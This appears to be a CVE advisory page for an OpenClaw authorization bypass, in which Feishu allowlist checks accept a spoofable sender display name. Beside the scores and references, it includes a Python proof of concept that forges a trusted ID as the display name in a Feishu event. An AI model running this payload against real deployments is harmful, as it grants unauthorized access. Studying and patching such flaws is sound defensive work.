CVE-2026-32021

Description

OpenClaw versions prior to 2026.2.22 contain an authorization bypass vulnerability in the Feishu allowFrom allowlist implementation that accepts mutable sender display names instead of enforcing ID-only matching. An attacker can set a display name equal to an allowlisted ID string to bypass authorization checks and gain unauthorized access.

CVSS Details

CVSS Score

6.5

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:* - VULNERABLE

OpenClaw < 2026.2.22

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/usr/bin/env python3
"""
PoC for CVE-2026-32021
Demonstrates authorization bypass by spoofing the sender display name.
"""
import requests
import json

def exploit_poc(target_url, trusted_whitelist_id):
    """
    Simulates a request to OpenClaw with a forged display name.
    :param target_url: The URL of the OpenClaw endpoint.
    :param trusted_whitelist_id: The ID string present in the allowFrom configuration.
    """
    headers = {'Content-Type': 'application/json'}
    
    # Construct a malicious payload mimicking a Feishu event
    # The key vulnerability is that the system checks 'name' instead of 'user_id'
    payload = {
        "token": "dummy_token",
        "challenge": "challenge_code",
        "event": {
            "sender": {
                "sender_id": {
                    "open_id": "ou_attacker_real_id", 
                    "user_id": "attacker_real_id"
                },
                # VULNERABILITY: Setting the mutable display name to the trusted ID
                "sender_name": trusted_whitelist_id, 
                "type": "user"
            },
            "message": {
                "content": "Unauthorized command execution attempt"
            }
        }
    }

    print(f"[*] Sending payload to {target_url}...")
    print(f"[*] Forged sender_name to: {trusted_whitelist_id}")
    
    try:
        response = requests.post(target_url, data=json.dumps(payload), headers=headers, timeout=10)
        if response.status_code == 200:
            print("[+] Potential exploit successful! Request accepted.")
            print(f"[+] Response: {response.text}")
        else:
            print(f"[-] Request failed with status code: {response.status_code}")
    except requests.exceptions.RequestException as e:
        print(f"[!] Error connecting to target: {e}")

if __name__ == "__main__":
    # Example usage
    target = "http://localhost:8080/api/feishu/callback"
    # Assume 'ou_admin123' is the ID in the allowFrom whitelist
    trusted_id = "ou_admin123" 
    exploit_poc(target, trusted_id)

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-32021
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-32021
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-32021/
[4] VulDB https://vuldb.com/cve/CVE-2026-32021
[5] https://github.com/openclaw/openclaw/commit/4ed87a667263ed2d422b9d5d5a5d326e099f92c7
[6] https://github.com/openclaw/openclaw/security/advisories/GHSA-j4xf-96qf-rx69
[7] https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-display-name-collision-in-feishu-allowfrom

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-32021", "sourceIdentifier": "[email protected]", "published": "2026-03-19T22:16:36.103", "lastModified": "2026-03-25T15:16:44.740", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "OpenClaw versions prior to 2026.2.22 contain an authorization bypass vulnerability in the Feishu allowFrom allowlist implementation that accepts mutable sender display names instead of enforcing ID-only matching. An attacker can set a display name equal to an allowlisted ID string to bypass authorization checks and gain unauthorized access."}, {"lang": "es", "value": "Versiones de OpenClaw anteriores a 2026.2.22 contienen una vulnerabilidad de omisión de autorización en la implementación de la lista de permitidos Feishu allowFrom que acepta nombres de visualización de remitente mutables en lugar de forzar la coincidencia solo por ID. Un atacante puede establecer un nombre de visualización igual a una cadena de ID en la lista de permitidos para omitir las comprobaciones de autorización y obtener acceso no autorizado."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 6.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "PRESENT", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-863"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:openclaw:openclaw:*:*:*:*:*:node.js:*:*", "versionEndExcluding": "2026.2.22", "matchCriteriaId": "6EA3E555-7328-4665-9FBC-BF4357239EDF"}]}]}], "references": [{"url": "https://github.com/openclaw/openclaw/commit/4ed87a667263ed2d422b9d5d5a5d326e099f92c7", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/openclaw/openclaw/security/advisories/GHSA-j4xf-96qf-rx69", "source": "[email protected]", "tags": ["Vendor Advisory"]}, {"url": "https://www.vulncheck.com/advisories/openclaw-authorization-bypass-via-display-name-collision-in-feishu-allowfrom", "source": "[email protected]", "tags": ["Third Party Advisory"]}]}}